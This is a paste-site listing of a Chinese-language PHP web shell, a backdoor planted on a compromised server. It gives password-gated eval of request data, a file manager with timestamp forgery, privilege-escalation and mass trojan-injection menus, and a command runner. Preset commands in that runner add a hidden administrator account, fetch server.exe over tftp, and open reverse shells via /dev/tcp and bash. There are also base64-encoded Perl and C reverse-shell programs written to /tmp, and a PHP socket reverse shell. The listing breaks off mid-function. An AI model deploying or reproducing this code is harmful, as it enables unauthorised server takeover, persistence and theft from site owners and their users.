· 6 years ago · Nov 05, 2019, 08:12 AM
1<?php
2header("Content-type:text/html;charset=gbk");
3$password='chuabdnklajwieowa';
4$shellname='FUCK you mother!!!';
5$myurl=null;
6error_reporting(0);
7ob_start();
8define('myaddress',$_SERVER['SCRIPT_FILENAME']);
9define('postpass',$password);
10define('shellname',$shellname);
11define('myurl',$myurl);
12if(@get_magic_quotes_gpc()){
13 foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
14 foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
15}
16if(isset($_REQUEST[postpass])){
17hmlogin(2);
18@eval($_REQUEST[postpass]);
19exit;}
20if($_COOKIE['postpass'] != md5(postpass)){
21 if($_POST['postpass']){
22 if($_POST['postpass'] == postpass){
23 setcookie('postpass',md5($_POST['postpass']));
24 hmlogin();
25 }else{
26 echo '<CENTER>用户或密码错误</CENTER>';
27 }
28 }
29 islogin($shellname,$myurl);
30 exit;
31}
32
33if(isset($_GET['down'])) do_down($_GET['down']);
34if(isset($_GET['pack'])){
35 $dir = do_show($_GET['pack']);
36 $zip = new eanver($dir);
37 $out = $zip->out;
38 do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
39}
40if(isset($_GET['unzip'])){
41 css_main();
42 start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
43 exit;
44}
45
46define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
47define('run_win',substr(PHP_OS, 0, 3) == "WIN");
48define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
49$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
50$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
51$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
52$name = isset($_POST['name']) ? $_POST['name'] : "";
53$img = isset($_GET['img']) ? $_GET['img'] : "";
54$p = isset($_GET['p']) ? $_GET['p'] : "";
55$pp = urlencode(dirname($p));
56if($img) css_img($img);
57if($eanver == "phpinfo") die(phpinfo());
58if($eanver == 'logout'){
59 setcookie('postpass',null);
60 die('<meta http-equiv="refresh" content="0;URL=?">');
61}
62
63$class = array(
64"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"),
65"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"),
66"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文件","scanphp" => "批量查找木马"),
67"脚本插件" => array("getcode" => "在线代理")
68);
69$msg = array("0" => "保存成功","1" => "保存失败","2" => "上传成功","3" => "上传失败","4" => "修改成功","5" => "修改失败","6" => "删除成功","7" => "删除失败");
70css_main();
71switch($eanver){
72 case "left":
73 css_left();
74 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">");
75 html_img("title");html_n(" 本地硬盘</a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");
76 $ROOT_DIR = File_Mode();
77 html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'>网站根目录</a></li>");
78 html_n("<li><a href='?eanver=main' target='main'>本程序目录</a></li>");
79 for ($i=66;$i<=90;$i++){$drive= chr($i).':';
80 if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;
81 html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>本地磁盘($drive)</a></li>");}}
82 html_n("</ul></dd></dl>");
83 $i = 2;
84 foreach($class as $name => $array){
85 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
86 html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
87 foreach($array as $url => $value){
88 html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>");
89 }
90 html_n("</ul></dd></dl>");
91 $i++;
92 }
93 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
94 html_img("title");html_n(" 其它操作</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
95 html_n("<li><a title='安全退出' href='?eanver=logout' target=\"main\">安全退出</a></li>");
96 html_n("</ul></dd></dl>");
97 html_n("</div>");
98 break;
99
100 case "main":
101 css_js("1");
102 $dir = @dir($path);
103 $REAL_DIR = File_Str(realpath($path));
104 if(!empty($_POST['actall'])){echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';}
105 $NUM_D = $NUM_F = 0;
106 if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
107 $ROOT_DIR = File_Mode();
108 html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>地址:<input type='hidden' name='eanver' value='main'>");
109 html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value='转到'></form>");
110 html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>");
111 html_n("<input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">");
112 html_input("file","upfilet",""," ");
113 html_input("submit","uploadt","上传");
114 if(!empty($_POST['newfile'])){
115 if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
116 $newfile=base64_decode($_POST['newfile']);
117 if(strtolower($_POST['charset'])=='utf-8'){$txt=base64_decode($_POST['txt']);}else{$txt=$_POST['txt'];}
118 if (substr(PHP_VERSION,0,1)>=5){if((strtolower($_POST['charset'])=='gb2312') or (strtolower($_POST['charset'])=='gbk')){$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST['txt']));}else{$txt = array_iconv($txt);}}
119 echo do_write($newfile,$bin,$txt) ? '<br>'.$newfile.' '.$msg[0] : '<br>'.$newfile.' '.$msg[1];
120 @touch($newfile,@strtotime($_POST['time']));
121 }
122 html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
123 html_a('?eanver=main&path='.uppath($path),'<b>上级目录</b>');
124 html_n('</b></td><td align="center" width="10%"><b>操作</b></td><td align="center" width="5%"><b>文件属性</b></td>');
125 html_n('<td align="center" width="8%"><b>('.get_current_user().')用户|组</b></td>');
126 html_n('<td align="center" width="10%"><b>修改时间</b></td><td align="center" width="10%"><b>文件大小</b></td></tr>');
127 while($dirs = @$dir->read()){
128 if($dirs == '.' or $dirs == '..') continue;
129 $dirpath = str_path("$path/$dirs");
130 if(is_dir($dirpath)){
131 $perm = substr(base_convert(fileperms($dirpath),10,8),-4);
132 $filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
133 $dirpath = urlencode($dirpath);
134 html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">');
135 html_img("dir");
136 html_a('?eanver=main&path='.$dirpath,$dirs);
137 html_n('</td><td align="center">');
138 html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\">改名</a>");
139 html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\">删除</a> ");
140 html_a('?pack='.$dirpath,'打包');
141 html_n('</td><td align="center">');
142 html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
143 html_n('</td><td align="center">'.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs"));
144 html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
145 html_n('</td></tr>');
146 $NUM_D++;
147 }
148 }
149 @$dir->rewind();
150 while($files = @$dir->read()){
151 if($files == '.' or $files == '..') continue;
152 $filepath = str_path("$path/$files");
153 if(!is_dir($filepath)){
154 $fsize = @filesize($filepath);
155 $fsize = File_Size($fsize);
156 $perm = substr(base_convert(fileperms($filepath),10,8),-4);
157 $filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
158 $Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
159 $todir=$ROOT_DIR.'/zipfile';
160 $filepath = urlencode($filepath);
161 $it=substr($filepath,-3);
162 html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">');
163 html_img(css_showimg($files));
164 html_a($Fileurls,$files,'target="_blank"');
165 html_n('</td><td align="center">');
166 if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
167 html_a('?unzip='.$filepath,'解压','title="解压'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"');
168 else
169 html_a('?eanver=editr&p='.$filepath,'编辑','title="编辑'.$files.'"');
170
171 html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\">改名</a>");
172 html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\">删除</a> ");
173 html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\">复制</a>");
174 html_a('?down='.$filepath,'下载','编辑','title="下载'.$files.'"');
175 html_n('</td><td align="center">');
176 html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
177 html_n('</td><td align="center">'.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files"));
178 html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
179 html_a('?down='.$filepath,$fsize,'title="下载'.$files.'"');
180 html_n('</td></tr>');
181 $NUM_F++;
182 }
183 }
184 @$dir->close();
185 if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
186print<<<END
187</table>
188<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined">
189<input type="hidden" id="inver" name="inver" value="undefined">
190<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);">
191<input type="button" value="复制" onclick="SubmitUrl('复制所选文件到路径: ','{$REAL_DIR}','a');return false;">
192<input type="button" value="删除" onclick="Delok('所选文件','b');return false;">
193<input type="button" value="属性" onclick="SubmitUrl('修改所选文件属性值为: ','0666','c');return false;">
194<input type="button" value="时间" onclick="CheckDate('{$Filetime}','d');return false;">
195<input type="button" value="打包" onclick="SubmitUrl('打包并下载所选文件下载名为: ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;">
196目录({$NUM_D}) / 文件({$NUM_F})</div>
197</form>
198END;
199 break;
200
201 case "editr":
202print<<<END
203<script>
204END;
205html_base();
206print<<<END
207 </script>
208END;
209 css_js("2");
210 if(!empty($_POST['uploadt'])){
211 echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
212 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
213 }
214 if(!empty($_GET['redir'])){
215 $name=$_GET['name'];
216 $newdir = str_path($p.'/'.$name);
217 @mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
218 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
219 }
220
221 if(!empty($_GET['refile'])){
222 $name=$_GET['name'];
223 $jspath=urlencode($p.'/'.$name);
224 $pp = urlencode($p);
225 $p = str_path($p.'/'.$name);
226 $FILE_CODE = "";
227 $charset= 'GB2312';
228 $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
229 if(@file_exists($p)) echo '发现目录下有"同名"文件<br>';
230 }else{
231 $jspath=urlencode($p);
232 $FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
233 $FILE_CODE=@file_get_contents($p);
234 if (substr(PHP_VERSION,0,1)>=5){
235 if(empty($_GET['charset'])){
236 if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}
237 }else{
238 if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
239 }
240 }
241 $FILE_CODE = htmlspecialchars($FILE_CODE);
242 }
243print<<<END
244<div class="actall">查找内容: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
245<input type="button" value="查找" onclick="search(searchs.value)"></div>
246<form method='POST' id="editor" action='?eanver=main&path={$pp}'>
247<div class="actall">
248<input type="text" name="newfile" id="newfile" value="{$p}" style="width:750px;">指定编码:<input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;">
249<input type="button" value="选择" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;">
250END;
251html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
252print<<<END
253</div>
254<div class="actall"><textarea name="txt" id="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>
255<div class="actall">文件修改时间 <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>以二进制形式保存文件(建议使用)</div>
256<div class="actall"><input type="button" value="保存" onclick="CheckDate();" style="width:80px;"> <input name='reset' type='reset' value='重置'>
257<input type="button" value="返回" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div>
258</form>
259END;
260 break;
261
262 case "rename":
263 html_n("<tr><td>");
264 $newname = urldecode($pp).'/'.urlencode($_GET['newname']);
265 @rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
266 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
267 break;
268
269 case "deltree":
270 html_n("<tr><td>");
271 do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
272 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
273 break;
274
275 case "del":
276 html_n("<tr><td>");
277 @unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
278 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
279 break;
280
281 case "copy":
282 html_n("<tr><td>");
283 $newpath = explode('/',$_GET['newcopy']);
284 $pathr[0] = $newpath[0];
285 for($i=1;$i < count($newpath);$i++){
286 $pathr[] = urlencode($newpath[$i]);
287 }
288 $newcopy = implode('/',$pathr);
289 @copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
290 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
291 break;
292
293 case "perm":
294 html_n("<form method='POST'><tr><td>".$p.' 属性为: ');
295 if(is_dir($p)){
296 html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']);
297 }else{
298 html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']);
299 }
300 html_input("submit","save","修改");
301 back();
302 if($_POST['class']){
303 switch($_POST['class']){
304 case "0777": $change = @chmod($p,0777); break;
305 case "0755": $change = @chmod($p,0755); break;
306 case "0555": $change = @chmod($p,0555); break;
307 case "0666": $change = @chmod($p,0666); break;
308 case "0644": $change = @chmod($p,0644); break;
309 case "0444": $change = @chmod($p,0444); break;
310 }
311 $change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
312 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
313 }
314 html_n("</td></tr></form>");
315 break;
316
317 case "info_f":
318 $dis_func = get_cfg_var("disable_functions");
319 $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
320 $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
321 if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
322 $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
323 $info = array(
324 array("服务器时间",date("Y年m月d日 h:i:s",time())),
325 array("服务器域名","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
326 array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
327 array("服务器操作系统",PHP_OS),
328 array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
329 array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
330 array("你的IP",$_SERVER["REMOTE_ADDR"]),
331 array("Web服务端口",$_SERVER['SERVER_PORT']),
332 array("PHP运行方式",strtoupper(php_sapi_name())),
333 array("PHP版本",PHP_VERSION),
334 array("运行于安全模式",Info_Cfg("safemode")),
335 array("服务器管理员",$adminmail),
336 array("本文件路径",myaddress),
337 array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
338 array("允许使用curl_exec",Info_Fun("curl_exec")),
339 array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
340 array("显示错误信息 display_errors",Info_Cfg("display_errors")),
341 array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
342 array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
343 array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
344 array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
345 array("允许最大上传文件 upload_max_filesize",$upsize),
346 array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
347 array("被禁用的函数 disable_functions",$dis_func),
348 array("phpinfo()",$phpinfo),
349 array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
350 array("图形处理 GD Library",Info_Fun("imageline")),
351 array("IMAP电子邮件系统",Info_Fun("imap_close")),
352 array("MySQL数据库",Info_Fun("mysql_close")),
353 array("SyBase数据库",Info_Fun("sybase_close")),
354 array("Oracle数据库",Info_Fun("ora_close")),
355 array("Oracle 8 数据库",Info_Fun("OCILogOff")),
356 array("PREL相容语法 PCRE",Info_Fun("preg_match")),
357 array("PDF文档支持",Info_Fun("pdf_close")),
358 array("Postgre SQL数据库",Info_Fun("pg_close")),
359 array("SNMP网络管理协议",Info_Fun("snmpget")),
360 array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
361 array("XML解析",Info_Fun("xml_set_object")),
362 array("FTP",Info_Fun("ftp_login")),
363 array("ODBC数据库连接",Info_Fun("odbc_close")),
364 array("Session支持",Info_Fun("session_start")),
365 array("Socket支持",Info_Fun("fsockopen")),
366 );
367 $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
368 echo '<table width="100%" border="0">';
369 for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
370try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
371$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
372$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
373}catch(Exception $e){}
374 echo '<tr><td width="40%">Terminal Service端口为</td><td>'.$registry_proxystring.'</td></tr>'."\n";
375 echo '<tr><td width="40%">Telnet端口为</td><td>'.$Telnet.'</td></tr>'."\n";
376 echo '<tr><td width="40%">PcAnywhere端口为</td><td>'.$PcAnywhere.'</td></tr>'."\n";
377 echo '</table>';
378 break;
379
380
381 case "cmd":
382 $res = '回显窗口';
383 $cmd = 'whoami';
384 if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));}
385
386print<<<END
387<script language="javascript">
388function sFull(i){
389 Str = new Array(11);
390 Str[0] = "dir";
391 Str[1] = "net user mysql$ envl /add";
392 Str[2] = "net localgroup administrators mysql$ /add";
393 Str[3] = "netstat -ano";
394 Str[4] = "ipconfig";
395 Str[5] = "tasklist /svc";
396 Str[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe";
397 Str[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";
398 Str[8] = "bash -i >& /dev/tcp/{$_SERVER["REMOTE_ADDR"]}/2366 0>&1";
399 Str[9] = "netstat -tlnp";
400
401 document.getElementById('cmd').value = Str[i];
402 return true;
403}
404END;
405html_base();
406print<<<END
407function SubmitUrl(){
408 document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value);
409 document.getElementById('gform').submit();
410}
411</script>
412<form method="POST" name="gform" id="gform" ><center><div class="actall">执行命令新增很多隐藏函数,外加使用BASE64加密提交,防止被拦(小细节,大成就)</div><div class="actall">
413命令参数 <input type="text" name="cmd" id="cmd" value="{$cmd}" onkeydown="if(event.keyCode==13)SubmitUrl();" style="width:399px;">
414<select onchange='return sFull(options[selectedIndex].value)'>
415<option value="0" selected>--命令集合--</option>
416<option value="1">添加管理员</option>
417<option value="2">设为管理组</option>
418<option value="3">查看端口</option>
419<option value="4">查看地址</option>
420<option value="5">查看进程</option>
421<option value="6">FTP下载</option>
422<option value="7">Linux反弹</option>
423<option value="8">bash反弹</option>
424<option value="9">Linux端口</option>
425</select>
426 <input type="button" value="执行" onclick="SubmitUrl();" style="width:80px;">
427</div>
428<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>
429</form>
430END;
431 break;
432
433
434
435case "linux":
436
437 $yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');
438 $yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388';
439
440 $system=strtoupper(substr(PHP_OS, 0, 3));
441print<<<END
442<div class="actall">使用方法:<br>
443 先在自己电脑运行"nc -vv -l 12388"<br>
444 然后在此填写你电脑的IP,点连接!此反弹很全很实用!包括NC反弹!</div>
445<form method="POST" name="kform" id="kform">
446<div class="actall">你的地址 <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>
447<div class="actall">连接端口 <input type="text" name="yourport" value="{$yourport}" style="width:400px"></div>
448<div class="actall">执行方式 <select name="use" >
449<option value="perl">Perl</option>
450<option value="c">C</option>
451<option value="php">PHP</option>
452<option value="nc">NC</option>
453</select></div>
454<div class="actall"><input type="submit" value="开始连接" style="width:80px;"></div></form>
455END;
456 if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
457 {
458 setcookie('yourip',$backip);
459 setcookie('yourport',$backport);
460
461 echo '<div class="actall">';
462 if($_POST['use'] == 'perl')
463 {
464 $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
465 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
466 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
467 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
468 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
469 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
470 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
471 echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/envl_bc成功<br>' : '创建/tmp/envl_bc失败<br>';
472 $perlpath = Exec_Run('which perl');
473 $perlpath = $perlpath ? chop($perlpath) : 'perl';
474 @unlink('/tmp/envl_bc.c');
475 echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败';
476 }
477 if($_POST['use'] == 'c')
478 {
479 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
480 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
481 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
482 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
483 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
484 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
485 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
486 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
487 echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/envl_bc.c成功<br>' : '创建/tmp/envl_bc.c失败<br>';
488 $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c');
489 @unlink('/tmp/envl_bc.c');
490 echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败';
491 }
492 if($_POST['use'] == 'php')
493 {
494 if(!extension_loaded('sockets'))
495 {
496 if ($system == 'WIN') {
497 @dl('php_sockets.dll') or die("Can't load socket");
498 }else{
499 @dl('sockets.so') or die("Can't load socket");
500 }
501 }
502 if($system=="WIN")
503 {
504 $env=array('path' => 'c:\\windows\\system32');
505 }else{
506 $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
507 }
508 $descriptorspec = array(
509 0 => array("pipe","r"),
510 1 => array("pipe","w"),
511 2 => array("pipe","w"),
512 );
513 $host = $_POST['yourip'];
514 $port = $_POST['yourport'];
515 $host=gethostbyname($host);
516 $proto=getprotobyname("tcp");
517 if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){
518 die("Socket创建失败");
519 }
520 if(($ret=socket_connect($sock,$host,$port))<0){
521 die("连接失败");
522 }else{
523 $message="----------------------PHP反弹连接--------------------\n";
524 socket_write($sock,$message,strlen($message));
525 $cwd=str_replace('\\','/',dirname(__FILE__));
526 while($cmd=socket_read($sock,65535,$proto)){
527 if(trim(strtolower($cmd))=="exit"){
528 socket_write($sock,"Bye\n");
529 exit;
530 }else{
531 $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
532 if (is_resource($process)) {
533 fwrite($pipes[0], $cmd);
534 fclose($pipes[0]);
535 $msg=stream_get_contents($pipes[1]);
536 socket_write($sock,$msg,strlen($msg));
537 fclose($pipes[1]);
538 $msg=stream_get_contents($pipes[2]);
539 socket_write($sock,$msg,strlen($msg));
540 $return_value = proc_close($process);
541 }
542 }
543 }
544 }
545 }
546 if($_POST['use'] == 'nc')
547 {
548 echo '<div class="actall">';
549 $mip=$_POST['yourip'];
550 $bport=$_POST['yourport'];
